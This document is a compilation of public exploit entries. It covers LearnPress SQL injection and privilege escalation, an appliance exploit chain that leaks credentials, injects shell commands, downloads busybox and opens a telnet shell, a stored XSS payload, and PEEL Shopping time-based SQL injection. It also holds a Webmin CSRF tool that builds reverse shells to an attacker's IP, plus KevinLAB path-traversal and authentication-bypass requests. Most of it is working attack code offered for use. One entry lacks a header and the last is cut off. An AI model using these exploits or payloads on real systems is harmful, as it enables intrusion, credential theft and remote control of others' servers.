
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010

POC:
1. Browse to http://<host>/wp-admin and log in (the PoC below was recorded as a user named "test", see the cookies)
2. Open the new-order screen, post-new.php?post_type=lp_order, so the lp-ajax=modal_search_items handler is reached in an authenticated context
3. Send the request below; a measurable delay in the response (from the sleep() call) shows that the current_items[] value reached the query unparameterized


POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

# The injection point is the current_items[] array value; swap in whatever payload suits the test (e.g. a different sleep() duration or a true/false condition for blind extraction)
            
import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests

# Shared flag polled by the PAPI race thread; main() clears it once the
# single_signon response shows the leaked config.
CONTINUE_RACE = True
# Upper bound used when padding the cp-upload 'upload_id' (see
# prepare_upload_id); the name suggests a fixed-size snprintf buffer on the
# target, which cannot be verified from this script alone.
SNPRINTF_CREATEFILE_MAX_LENGTH = 245

# Every request below talks to the appliance's self-signed HTTPS listener with
# verify=False; silence the InsecureRequestWarning rather than spam the console.
urllib3.disable_warnings()


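def _build_papi_packet():
    """Return the UDP datagram that race_papi_message() replays.

    The leading 76 bytes are a fixed header copied verbatim from the original
    PoC; their field meanings are not documented there and are not guessed at
    here (the two 7F 00 00 01 runs look like 127.0.0.1 in network order). The
    tail is the ASCII string ``msg_ref 3000 /tmp/cfg-plaintext\\0`` with every
    byte XOR'd by 0x93.
    """
    header = b"".join((
        b"\x49\x72",
        b"\x00\x03",
        b"\x7F\x00\x00\x01",
        b"\x7F\x00\x00\x01",
        b"\x00\x00",
        b"\x00\x00",
        b"\x3B\x7E",
        b"\x41\x41",
        b"\x04\x22",
        b"\x00\x00",
        b"\x02\x00",
        b"\x00\x00",
        b"\x00" * 12 * 4,
    ))
    text = "msg_ref 3000 /tmp/cfg-plaintext\x00"
    obfuscated = bytes(ord(ch) ^ 0x93 for ch in text)
    return header + obfuscated


def race_papi_message(ip):
    """Flood UDP/8211 on *ip* with one fixed datagram until CONTINUE_RACE is cleared.

    Runs in a background thread started by main(); main() sets the module
    flag CONTINUE_RACE to False once the single_signon probe returns the
    leaked config. The 4 ms pause between sends is from the original PoC.

    Args:
        ip: target address (UDP port 8211 is hard-coded).

    Changes from the original: the packet is built once instead of on every
    iteration, the socket is closed via a context manager even if send()
    raises, and the redundant ``global`` declaration (the flag is only read
    here) is gone.
    """
    packet = _build_papi_packet()
    while CONTINUE_RACE:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.connect((ip, 8211))
            sock.send(packet)
        time.sleep(0.004)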


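def find_credentials(text):
    """Extract the (username, password) pair from a leaked ``mgmt-user`` line.

    Args:
        text: the plaintext config recovered by the race (see main()).

    Returns:
        ``(username, password)`` — the second and third whitespace-separated
        tokens of the first line starting with ``mgmt-user``.

    Raises:
        ValueError: when no ``mgmt-user`` line is present or it has fewer than
            three tokens. The original indexed ``re.search(...)[0]`` directly
            and died with an unhelpful TypeError on a miss.
    """
    match = re.search(r"mgmt-user .*", text)
    if match is None:
        raise ValueError("no 'mgmt-user' line found in the leaked config")
    tokens = match[0].split()
    if len(tokens) < 3:
        raise ValueError("malformed 'mgmt-user' line: {!r}".format(match[0]))
    return (tokens[1], tokens[2])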


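def login(ip, username, password):
    """POST ``opcode=login`` to swarm.cgi and return the session id from the XML reply.

    Args:
        ip: target address (HTTPS on 4343, certificate not verified).
        username, password: the pair recovered by find_credentials().

    Returns:
        The text of the ``<data name="sid">`` element.

    Raises:
        RuntimeError: when the reply carries no sid (bad credentials or an
            unexpected page) — the original raised AttributeError on ``None``.
        xml.etree.ElementTree.ParseError: when the body is not XML at all.
    """
    login_data = {
        "opcode": "login",
        "user": username,
        "passwd": password,
        "refresh": "false",
    }
    # timeout added: the original could block forever on a stalled socket.
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False, timeout=10)

    root = ET.fromstring(res.text)
    sid_node = root.find("./data[@name='sid']")
    if sid_node is None or not sid_node.text:
        raise RuntimeError("login failed: no sid in swarm.cgi response (HTTP {})".format(res.status_code))
    return sid_node.text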


def create_directory(ip, sid):
    """Ask the appliance to create /tmp/oper_/ via an injected cplogo-install option.

    The ``cmd`` value is ``end`` + newline + ``apply cplogo-install "<url>"``
    where the URL carries tab-separated (%09) extra text, apparently so that
    whatever fetches the logo also receives ``--directory-prefix /tmp/oper_/``
    and creates that directory. Success is judged by the string ``/tmp/oper_``
    appearing in the response body.

    Args:
        ip: target address.
        sid: session id from login().

    Returns:
        True when the marker string was found, False otherwise; a status
        line is printed in both cases.
    """
    body = (
        "opcode=config&ip=127.0.0.1"
        "&cmd='end%20%0Aapply%20cplogo-install%20"
        "\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'"
        "&refresh=false&sid={sid}&nocache=0.23759201691110987&="
    ).format(ip=ip, sid=sid)
    response = requests.post("https://{}:4343/swarm.cgi".format(ip), data=body, verify=False)
    created = "/tmp/oper_" in response.text
    if created:
        print("[+] Successfully created /tmp/oper_/ directory :)")
    else:
        print("[-] Failed creating /tmp/oper_/ directory")
    return created


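def prepare_upload_id(command, max_length=None):
    """Build the traversal/injection string used as the cp-upload ``upload_id``.

    Layout: ``/../../etc/httpd/`` + N slashes + ``A'; <command> #.gz``, padded
    so the whole string is exactly *max_length* characters — the original
    relies on that exact length (see SNPRINTF_CREATEFILE_MAX_LENGTH). The 8
    accounts for ``'; `` (3), `` #`` (2) and ``.gz`` (3).

    Args:
        command: shell text to embed (already escaped by build_command()).
        max_length: total length to pad to; defaults to the module constant
            SNPRINTF_CREATEFILE_MAX_LENGTH (245).

    Returns:
        The padded upload_id string.

    Raises:
        SystemExit: when *command* leaves no room for the padding. The
            original accepted padding_len == 0, which produced a string one
            character over the limit (the 'A' has no slot then); that case is
            rejected too.
    """
    if max_length is None:
        max_length = SNPRINTF_CREATEFILE_MAX_LENGTH
    base_payload = "/../../etc/httpd/"
    suffix = "'; {} #.gz".format(command)
    padding_len = max_length - len(command) - len(base_payload) - 8
    if padding_len < 1:
        print("[-] Command too long: {} chars, {} over the limit".format(len(command), 1 - padding_len))
        sys.exit(1)
    return base_payload + ("/" * (padding_len - 1)) + "A" + suffix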


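def create_file(ip, command):
    """Upload a throwaway 'logo' whose upload_id makes a file named after *command* land under /etc/httpd/.

    The ``upload_id`` is the traversal string from prepare_upload_id(); the
    ``sid`` is deliberately junk (``basdfbsfbsfb``), so the PoC apparently
    relies on the cp-upload handler not validating the session. The content
    ``test2`` is presumably irrelevant — run_command() only needs the
    resulting file name.

    Args:
        ip: target address.
        command: shell text already escaped by build_command().

    Returns:
        The requests.Response, so callers can inspect the status (the
        original discarded it).
    """
    upload_id = prepare_upload_id(command)
    return requests.post(
        "https://{}:4343/swarm.cgi".format(ip),
        data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"},
        files={"file": "test2"},
        verify=False,
        timeout=10,
    )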


def run_command(ip, command):
    """Request the staged file so the injected command runs; return the body.

    The path ``A';%20<command>%20%23`` mirrors the ``A'; <command> #`` file
    name that create_file() staged under /etc/httpd/. Before insertion,
    ``?`` becomes ``%3F`` (so it is not taken as a query string) and ``#``
    becomes ``\\x23`` (same trick as build_command(), so it is not taken as
    a fragment). The request is built with Request().prepare() and
    Session.send(), presumably to keep the path encoding exactly as written.

    Args:
        ip: target address.
        command: output of build_command().

    Returns:
        The response text.
    """
    print("[*] Executing telnet")
    encoded = command.replace("?", "%3F").replace("#", "\\\\x23")
    url = "https://{}:4343/A';%20{}%20%23".format(ip, encoded)
    session = requests.Session()
    prepared = requests.Request("GET", url).prepare()
    return session.send(prepared, verify=False).text

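def build_command(command):
    """Wrap *command* in ``echo -e "<command>"|sh`` with the characters the injection path cannot carry escaped.

    Replacements (single pass; none of the substitutions produces a character
    that a later one would touch, so this equals the original's chained
    ``str.replace`` calls):

    * ``/`` -> ``\\\\x2F`` and ``#`` -> ``\\\\x23``: two literal backslashes
      plus a hex escape, i.e. one backslash survives whatever strips a level
      of escaping on the way in and ``echo -e`` then restores the byte.
    * ``"`` -> ``\\"`` and `` ` `` -> ``\\` ``: kept inert inside the double
      quoted ``echo -e`` argument.

    Fix over the original: the backtick replacement was written as ``"\\`"``
    with a single backslash, an invalid escape that only worked because
    Python keeps unknown escapes verbatim (and warns from 3.12 on).

    Args:
        command: raw shell text.

    Returns:
        The escaped ``echo -e "..."|sh`` string.
    """
    table = str.maketrans({
        "/": "\\\\x2F",
        "#": "\\\\x23",
        "\"": "\\\"",
        "`": "\\`",
    })
    return "echo -e \"{}\"|sh".format(command.translate(table))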

def telnet_connect(router_ip):
    """Attach an interactive session to the telnetd started on port 22222.

    Before handing the terminal over, it deletes ``/etc/httpd/A*sh*.gz`` —
    the file staged by create_file() (``A'; echo -e "..."|sh #.gz``) — as a
    cleanup step.

    NOTE(review): telnetlib is deprecated since Python 3.11 and removed in
    3.13 (PEP 594); on newer interpreters this needs a plain socket loop.

    Args:
        router_ip: target address.
    """
    cleanup = b"rm /etc/httpd/A*sh*.gz\n"
    print("[*] Connecting to telnet")
    session = telnetlib.Telnet(router_ip, 22222)
    with session as tn:
        tn.write(cleanup)
        tn.interact()


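def main():
    """Entry point: leak the admin credentials, log in, stage a telnetd and connect.

    Flow (each step is one helper):
      1. race_papi_message() floods UDP/8211 in a background thread while this
         thread polls ``swarm.cgi?opcode=single_signon``; once the reply
         contains "version", the leaked config is expected inside the page's
         ``SESSION_ID`` variable.
      2. find_credentials() pulls the mgmt-user line; login() turns it into a sid.
      3. create_directory() + create_file() stage a file under /etc/httpd/ and
         run_command() requests it, which is where the injected shell command
         is expected to run.
      4. telnet_connect() attaches to the busybox telnetd on port 22222.

    Usage: ``python3 <script> <target-ip>``.

    Changes from the original: argv is validated; the race thread is a daemon
    and is always stopped via try/finally, so an exception in the polling loop
    (connection refused, timeout, Ctrl-C) no longer leaves a non-daemon
    thread flooding forever; the SESSION_ID regex miss is reported instead
    of raising IndexError.
    """
    global CONTINUE_RACE

    if len(sys.argv) != 2:
        print("usage: {} <target-ip>".format(sys.argv[0]))
        sys.exit(1)
    ip = sys.argv[1]

    print("[*] Starting the PAPI race thread")
    papi_thread = threading.Thread(target=race_papi_message, args=(ip,), daemon=True)
    papi_thread.start()

    res = None
    try:
        while CONTINUE_RACE:
            time.sleep(0.1)
            res = requests.get(
                "https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip),
                timeout=3, verify=False)
            if "version" in res.text:
                print("[+] Successfully leaked the password from config")
                CONTINUE_RACE = False
    finally:
        # Stop the flood whichever way the loop is left.
        CONTINUE_RACE = False
        papi_thread.join(timeout=1)

    if res is None:
        print("[-] Race loop never ran; nothing to parse")
        sys.exit(1)
    session_blob = re.findall(r"var SESSION_ID = '(.*?)';", res.text, re.S)
    if not session_blob:
        print("[-] Leaked page has no SESSION_ID field; cannot parse the config")
        sys.exit(1)
    user, password = find_credentials(session_blob[0])

    print("[+] Successfully extracted username: {} and password: {}".format(user, password))
    sid = login(ip, user, password)
    print("[*] SID generated: {}".format(sid))

    # NOTE(review): this makes the *target* fetch an unverified busybox binary
    # from the public internet with --no-check-certificate. On an engagement,
    # host the binary yourself (and check its hash) and point this URL at it;
    # the command string is otherwise left exactly as in the original PoC.
    command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
    final_command = build_command(command)

    if not create_directory(ip, sid):
        return

    print("[*] Creating malicious file in /etc/httpd/")
    create_file(ip, final_command)
    print(run_command(ip, final_command))
    time.sleep(1)  # give telnetd a moment to bind 22222 before connecting
    telnet_connect(ip)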


# Script entry point: `python3 <script> <target-ip>` (see main()).
if __name__ == "__main__":
    main()
            
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find your own WordPress user ID (the numeric ID of the account you will use)
2. Log in with that account
3. While logged in, request the URL below with your ID in user_id


http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

# Done! The request is reported to grant the LearnPress teacher role to the supplied user_id without checking that the caller is allowed to do so (CVE-2020-11511), which is the privilege escalation.
            
# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
# Date: 19/07/2021
# Exploit Author: Aakash Choudhary
# Software Link: https://wordpress.org/plugins/kn-fix-your/
# Version: 1.0.1
# Category: Web Application
# Tested on Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate KN Fix Your Title
3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field.
4. Click Save Changes.
5. The payload is stored in the plugin's settings; when the same settings screen is opened again it is rendered back unescaped, so the script executes and the alert pops up.
6. Payload Used: "><script>alert(document.cookie)</script>
            

PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection

# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Date: 2021-07-10
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.peel.fr
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
# Version: prior to 9.4.0 (the requests below were recorded against a peel-shopping_9_4_0 install, and the author states the fix shipped in 9.4.0.1, so treat 9.4.0 as affected too)
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/advisto/peel-shopping/issues/3
# CVE: CVE-2021-37593

################
# Description #
################

# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting.
# An unauthenticated visitor (public user/guest) can inject SQL through the "id" parameter of the
# "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint and alter the predefined query.
# A successful injection lets the attacker read sensitive data from the database or modify it.

#####################
# PoC of detection #
#####################

1) Assumes the out-of-the-box peel-shopping_9_4_0 installation uses the database name "peel".
   The query checks whether DATABASE() LIKE hex('%peel%'); when that is TRUE the response is
   delayed for 7 seconds before the redirect to the homepage (http://localhost/peel-shopping_9_4_0/),
   which indicates the database name matches "peel".
PoC #1) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) Request: The response duration = 418 bytes | 7,719 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE. 
PoC #2) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) Request: The response duration = 418 bytes | 5,112 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly. 
PoC #3) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) Request: The response duration = 418 bytes | 10,140 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- # For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3. # The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1 # The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]

Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)

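#!/usr/bin/env python3
# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
# get a Remote Command Execution (RCE) through the Webmin's running process
# feature
"""CVE-2021-31761 PoC.

Prints a link under ``<webmin>/tunnel/link.cgi/`` whose path is a URL-encoded
HTML page. When a logged-in Webmin administrator opens it, the reflected page
auto-submits a POST to ``/proc/run.cgi`` with ``cmd`` set to a reverse shell
and ``user=root``; the netcat listener started afterwards catches the callback.

Fixes over the original listing:
* the command is HTML-escaped before being placed in the ``value="..."``
  attribute — every shell except the bash one contains double quotes, which
  previously terminated the attribute and truncated the command;
* ``nc`` is invoked as ``["nc", "-nlvp", port]`` instead of a single
  ``"-nlvp <port>"`` argument;
* an unknown menu choice aborts instead of embedding the raw input as the
  command;
* the prompts run inside main() rather than at import time, and the pure
  helpers can be tested offline.
"""
import html
import random
import subprocess
import time
import urllib.parse

LINK_CGI = "tunnel/link.cgi/"

# Reverse-shell one-liners from the original PoC. {ip}/{port}/{fifo} are
# substituted with str.replace, not str.format, because the perl variant
# contains literal braces.
REVERSE_SHELLS = {
    "1": "mkfifo /tmp/{fifo}; nc {ip} {port} 0</tmp/{fifo} | /bin/sh >/tmp/{fifo} 2>&1; rm /tmp/{fifo}",
    "2": """ php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");' """,
    "3": """ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' """,
    "4": """ perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' """,
    "5": """ ruby -rsocket -e'f=TCPSocket.open("{ip}",{port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' """,
}


def build_target_url(target):
    """Append ``tunnel/link.cgi/`` to the Webmin base URL, inserting a '/' if missing."""
    if target.endswith("/"):
        return target + LINK_CGI
    return target + "/" + LINK_CGI


def reverse_shell_command(choice, ip, port, fifo_name):
    """Return the reverse-shell one-liner for menu *choice* ('1'..'5').

    Args:
        choice: menu number as typed by the user.
        ip, port: listener address, inserted verbatim.
        fifo_name: /tmp FIFO name used only by the bash variant (the original
            draws it from random.randrange(1000)).

    Raises:
        KeyError: for an unknown choice.
    """
    template = REVERSE_SHELLS[choice]
    return (template.replace("{ip}", ip)
                    .replace("{port}", port)
                    .replace("{fifo}", str(fifo_name)))


def csrf_page(command):
    """Return the self-submitting HTML that POSTs *command* to /proc/run.cgi as root.

    ``meta referrer=never`` and ``history.pushState`` are from the original
    (hide where the page came from); the command is HTML-escaped so quotes
    and ``<``/``>`` survive inside the hidden input's value attribute.
    """
    return """<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="{}" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
""".format(html.escape(command, quote=True))


def csrf_link(base_url, command):
    """Return the link to hand to a Webmin admin: *base_url* + the URL-encoded CSRF page."""
    return base_url + urllib.parse.quote(csrf_page(command))


def print_banner():
    """Reproduce the original banner (the ASCII art lost its alignment when the listing was collapsed)."""
    print('''\033[1;37m __ __ _ ____ _ _________ _ _ _ | \\/ | | | |___ \\| | |___ / _ \\| | | | | | | \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/ __/ | |___/ \033[1;m''')
    for i in range(101):
        print("\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(i), "\033[1;36m%\033[1;m", end="")
        time.sleep(0.02)
    print("\n\n")


def netcat_listener(port):
    """Run ``nc -nlvp <port>`` in the foreground and wait for the callback.

    The original passed ``"-nlvp <port>"`` as one argv element, so nc saw the
    port glued to the option cluster; flags and port are separate here.
    """
    print()
    subprocess.run(["nc", "-nlvp", port])


def main():
    """Prompt for target, listener and shell type, print the link, then listen."""
    print_banner()
    target = build_target_url(input("\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m"))
    ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
    port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
    choice = input('''\033[1;37m \n 1- Bash Reverse Shell \n 2- PHP Reverse Shell \n 3- Python Reverse Shell \n 4- Perl Reverse Shell \n 5- Ruby Reverse Shell \n \033[1;m \033[1;36mPlease insert the number Reverse Shell's type u want e.g.
( 1 ) > \033[1;m''')
    try:
        command = reverse_shell_command(choice, ip, port, random.randrange(1000))
    except KeyError:
        print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
        return
    print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
    print(csrf_link(target, command))
    netcat_listener(port)


if __name__ == '__main__':
    main()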
# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'page' GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5656 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php 05.07.2021 -- GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ... ...

KevinLAB BEMS 1.0 - Authentication Bypass

# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. 
Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php

05.07.2021

--

PoC POST data payload (extract):
--------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
